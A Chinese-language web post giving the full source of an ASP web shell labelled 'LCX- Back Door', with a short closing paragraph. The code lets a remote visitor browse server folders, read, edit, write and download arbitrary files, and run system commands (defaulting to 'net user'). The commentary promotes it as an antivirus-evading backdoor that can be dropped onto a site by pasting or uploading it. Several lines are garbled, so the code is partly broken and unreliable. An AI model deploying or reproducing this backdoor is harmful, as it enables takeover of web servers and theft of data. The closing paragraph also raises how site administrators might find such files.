源码如下
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>LCX_explore</title>
<style type="text/css">
*,body{
background:#000;
color:#fff;
font-size:14px;
}
</style>
<%
Const She = "Shell"
Const APP = "Application"
Dim CreateType
CreateType = Trim(Request("Type"))
If CreateType <> "" And IsNumeric(CreateType) Then'返回的参数进行类型判断
CreateType = Clng(CreateType)
Else
CreateType = 0
End If
SELECT CASE CreateType'动作调用
CASE 0
Call Main()
CASE 1
Call ReadData()
CASE 2
Call WriteData()
CASE 3
Call DownLoad()
CASE 4
Call Run()
End SELECT
SUB CSTM(X)'创建数据流对象
Set X = Server.CreateObject("ADODB.Stream")
End SUB
SUB Run()'运行
set oS=Server.CreateObject("WScrip.shell")
ok=trim(Request("ok"))
if ok<>"" then
set (ok)
re=adall
response.write "<body onload='javascript:parent.OnlineView.height=this.document.body.scrollHeight+10;' leftmargin=0 topmargin=0>"
response.write "<textarea cols=64 rows=25>"&Re&"</textarea>"
end if
End SUB
SUB WriteData()'写数据
Dim FileName,X,FileContent,FileNameString
FileName = Trim(Request("FileName"))
If FileName = "" Then Exit SUB
FileContent = Trim(Request("Content"))
Call CSTM(X)
With X
.Type = 2
.MODE = 3
.
OPEN
.Charset ="gb2312"
.WriteText FileContent
.Position = 2
.SaveToFile FileName,2
.Close
End With
Response.Write("<TABLE width=98% border=0 align=center cellpadding=5 cellspacing=0 bgcolor=#f6f6f6><TR><TD bgcolor=#000000><STRONG>File </STRONG></TD></TR><TR style='color:#FFFFFF'>")
Response.Write("<TD BGCOLOR=#789ff HEIGHT=25><a href=""(-1);""><font color=#FFFFFF>Return</font></a></TD></TR><TR><TD BGCOLOR=#FFFFFF HEIGHT=35><font color=#7896ff>Status:</font&</TD>")
Response.Write("</TR></TABLE>")
End SUB
SUB DownLoad()'下载文件
Dim FileName,X,FileContent,FileNameString
FileName = Trim(Request("FileName"))
If FileName = "" Then Exit SUB
FileContent = Split(FileName,"\")
FileNameString = FileContent(UBound(FileContent))
Call UseStream(FileName,FileNameString)
End SUB
SUB ReadData()'读文件
Dim FileName,X,FileContent,FileType,Vtype
FileName = Trim(Request("FileName"))
If FileName = "" Then Exit SUB
Call CSTM(X)
With X
.Type = 2
.MODE = 3
.OPEN
.LOADFROMFILE FileName
If Trim(Request("ViewType")) = "" Then
.Charset ="gb2312"
.
Position = 2
VType = "1"
Else
VType = ""
End If
FileContent = .ReadText()
.Close
End With
%>
<body onLoad="javascript:parent.OnlineView.height=this.document.body.scrollHeight+10;" leftmargin="0" topmargin="0">
<form name=form1 action="?Type=2&FileName=<%=FileName%>" method=Post>
<textarea Name=Content cols=90 rows=25><%=Server.HTMLEncode(FileContent)%></textarea><br><br>
<input type=button value=Save onClick="document.all.form1.submit();">
<input typ
e=button value="Save As" name=add id=add onClick="addn()">
<input type=button value=ENCODE Onclick="javascript:location.href='?Type=1&FileName=<%=Replace(FileName,"\","\\")%>&ViewType=<%=VType%>';"></form>
<script language="javascript">
setTimeout('view()',500);
function view(){
parent.Load.style.display='none';
parent.Loaded.style.display='block';
parent.OnlineView.height=this.document.body.scrollHeight+10;
}
</script>
<script language="vbscript">
sub addn()
Filename = InputBox("Input Full Path With Filename","","<%=FileName%>")
If Filename <> "" Then
document.all.form1.action="?Type=2&FileName=" & Filename
document.all.form1.submit
End If
end sub
</script>
<%
End SUB
Function GetContentType(FlName)
Select Case GetFileTypeName(flName)
Case "asf"
GetContentType = "video/x-ms-asf"
Case "avi"
GetContentType = "video/avi"
Case "doc"
GetContentType = "application/msword"
Case "zip"
GetContentType = "application/zip"
Case "xls"
GetContentType = "application/vnd.ms-excel"
Case "gif"
GetContentType = "image/gif"
Case "jpg", "jpeg"
GetContentType = "image/jpeg"
Case "wav"
GetContentType = "audio/wav"
Case "mp3"
GetContentType = "audio/mpeg3"
Case "mpg", "mpeg"
GetContentType = "video/mpeg"
Case "rtf"
GetContentType = "application/rtf"
Case "htm", "html"
GetContentType = "text/html"
Case "txt"
GetContentType = "text/plain"
Case Else
GetContentType = "application/octet-stream"
End Select
End Function
Function GetFileTypeName(FldName)
If InStr(FldName, ".") > 0 Then
Dim FiNameStr
FiNameStr = Split(FldName,".")
GetFileTypeName = Lcase(FiNameStr(UBound(FiNameStr)))
Else
GetFileTypeName = "unknow"
End If
End Function
SUB UseStream(FileName,FileNameString)
Dim FileStream,File,FileContentType,IsAttachment
Call CSTM(FileStream)
FileStream.Open
FileStream.Type = 1
File = FileName
FileStream.LoadFromFile(File)
FileContentType = GetContentType(FileName)
IsAttachment = "attachment; "
Response.AddHeader "Content-Disposition", IsAttachment & "filename=" & FileNameString  'attachment;
Response.AddHeader "Content-Length", FileStream.Size
Response.Charset = "UTF-8"
Response.ContentType = FileContentType
Response.BinaryWrite FileStream.Read
Response.Flush
FileStream.Close
Set FileStream = Nothing
End SUB
Function CreateProgID(Var1,Var2)
CreateProgID = Var1 & "." & Var2
End Function
Function bin2str2(binstr)
Dim BytesStream,StringReturn
Call CSTM(BytesStream)
With BytesStream
.Type = 2
.Open
.WriteText binstr
.Position = 0
.Charset = "GB2312"
.Position = 2
StringReturn = .ReadText(.Size)
.close
End With
Set BytesStream = Nothing
bin2str2 = StringReturn
End Function
SUB GetFolder(FolderName)
dim FileContent,FileNameString
set ateobject(CreateProgID(She,APP))
XA = FolderName
if (XA <> "") then
set fod1=sl.namespace(XA)
set fod
items=fod1.items
for each co in foditems
If co.isfolder Then response.write "<font color=#FCC000>[</font> <a href=""?DirName=" & co.path & """><font color=black>" & Replace(Replace(Right(co.path,Len(co.path) - Len(XA)),"\",""),"/","") & "</font></a><font color=#FCC000>]</font><br>" & VBCRLF
next
End If
End SUB
SUB GetFiler(FolderName)
set ateobject(CreateProgID(She,APP))
XA = FolderName
if (XA <> "") then
set fod1=sl.namespace(XA)
set foditems=fod1.items
for each co in foditems
If Not co.isfolder Then response.write "<font color=black>" & Replace(Replace(Right(co.path,Len(co.path) - Len(XA)),"\",""),"/","") & "</font> - <a href=#this Onclick=""DownLoad('" & Replace(co.path,"\","\\") & "')""><font color=#999900>Down</font></a> - <a href=#this Onclick=""GetFileContent('" & Replace(co.path,"\","\\") & "')""><font color=#999900>Edit</font></a> - <font color=#0099FF>" & co.size & "</font> </a>B<br>" & VBCRLF
next
End If
End SUB
SUB Main()
If Trim(Request("DirName")) = "" Then
LocDirName = SERVER.MapPath(".")
Else
LocDirName = Trim(Request("DirName"))
End If
If Right(LocDirName,1) = ":" Then LocDirName = LocDirName & "\"
RootDirName = Replace(Left(LocDirName,3),"\","\\")
ParentDirName = ""
If Instr(LocDirName,"\") And Right(LocDirName,2) <> ":\" Then
DirNameArray = Split(LocDirName,"\")
ParentDirName = Left(LocDirName,Len(LocDirName) - Len(DirNameArray(Ubound(DirNameArray))))
If Right(ParentDirName,1) = "\" And Right(ParentDirName,2) <> ":\" Then ParentDirName = Left(ParentDirName,Len(ParentDirName) - 1)
ParentDirName = Replace(ParentDirName,"\","\\")
End If
%>
<body>
<div id="MaoDiv" ></div>
<table border=0 Align=center width=758 cellspacing="0" cellpadding="3">
<tr><td colspan=2 height=25>
<font face=Arial><b><%=Request.ServerVariables("server_name")%> For LCX- Back Door</b></font>
</td></tr>
<tr><td colspan=2 height=5 bgcolor=#89b7f0></td></tr>
<tr>
<td valign=top bgcolor=#F6F6F6 width=35% >
PATH - <font color=blue><%=LocDirName%></font> <br><font color=#999999 onclick="ChangeDir()">[CDIR]</font>
</td>
<td valign=top bgcolor=#F6F6F6 width=35% >
<input type="text" name="ok" id="ok" size=55 value="net user" ><input type=button onclick=Run(ok.value) value=Run>
</td>
</tr>
<tr>
<td colspan=2 bgcolor=#0099FF height=2>
</td>
</tr>
<tr>
<td valign=top bgcolor=#F6F6F6 width=35% >
<% If ParentDirName <> "" Then %><font color=#000000 onclick="javascript:location.href='?DirName=<%=RootDirName%>'
;">Root</font><br><font color=#000000 onclick="javascript:location.href='?DirName=<%=ParentDirName%>';">..</font><br>
<%
End If
Call GetFolder(LocDirName)
%>
</td>
<td width=65% Align=left valign=top>
<%Call GetFiler(LocDirName)%>
<table border=0 width=100% class="table2">
<tr id="OnlineView">
<td valign=top>
<div id="Load" ><br&</div>
<div id="Loaded" ><iframe id="ListView" name="ListView" frameborder="0" scrolling="no" align=left valign="top" width="100%" height="100%"></iframe></div>
</td></tr></table>
</td>
</tr>
<tr><td colspan=2 height=5 bgcolor=#89b7f0></td></tr>
<tr>
</td>
<td colspan=2 Align=Right >Hacker by LCX</td>
</tr>
</table>
</body>
<%
End SUB
%>
<head>
<title><%=Request.ServerVariables("server_name")%></title>
<script>
function GetFileContent(FileName){
parent.Load.style.display = 'block';
parent.Loaded.style.display = 'none';
ListView.location.href = '?Type=1&FileName=' + FileName;
}
function DownLoad(FileName){
ListView.location.href = '?Type=3&FileName=' + FileName;
}
function Run(cmd){
parent.Load.style.display = 'none';
parent.Loaded.style.display = 'block';
ListView.location.href = '?Type=4&ok=' + cmd;
asp网页源码
}
function hide(){
Load.style.display = 'none';
}
function ChangeDir(){
if(MaoDiv.style.display=='block')
{
MaoDiv.style.display = 'none';}
else
{
MaoDiv.style.display = 'block';
MaoDiv.innerHTML = "<CENTER><br> <input type=text name=DirName id=DirName VALUE='c:\\'> <input type=button onclick=\'javascript:if(DirName.value!=\"\"){location.href=\"?DirName=\" + DirName.value;}\' value=GO> <font color=#999999 style=\'cursor:hand\' onclick=\'ChangeDir()\'>CLOSE</font></CENTER>";}
MaoDiv.style.posLeft = window.event.x - 100;
if(MaoDiv.style.posLeft < 0){
MaoDiv.style.posLeft = 0;
}
MaoDiv.style.posTop = window.event.y + document.body.scrollTop - 10;
}
</script>
</head>
简单的说几句,这是一个免杀的微型大马(代码不多:后门程序),Hacker把代码复制之后,粘贴到记事本中,把扩展名改为asp,就可以用了;或者是前面的小马上传以上代码也可以;没有什么技术含量——所以呢,基本上懂电脑的就可以操作;介于这段代码是免杀的,并且也比较隐蔽,和一般的ASP页面没有多大的区别,所以就给网站管理员提出新的问题了——你怎么知道这个程序是后门程序,在没有杀毒软件支持下,你如何手动在成千上万的ASP页面中到它,并把它删掉?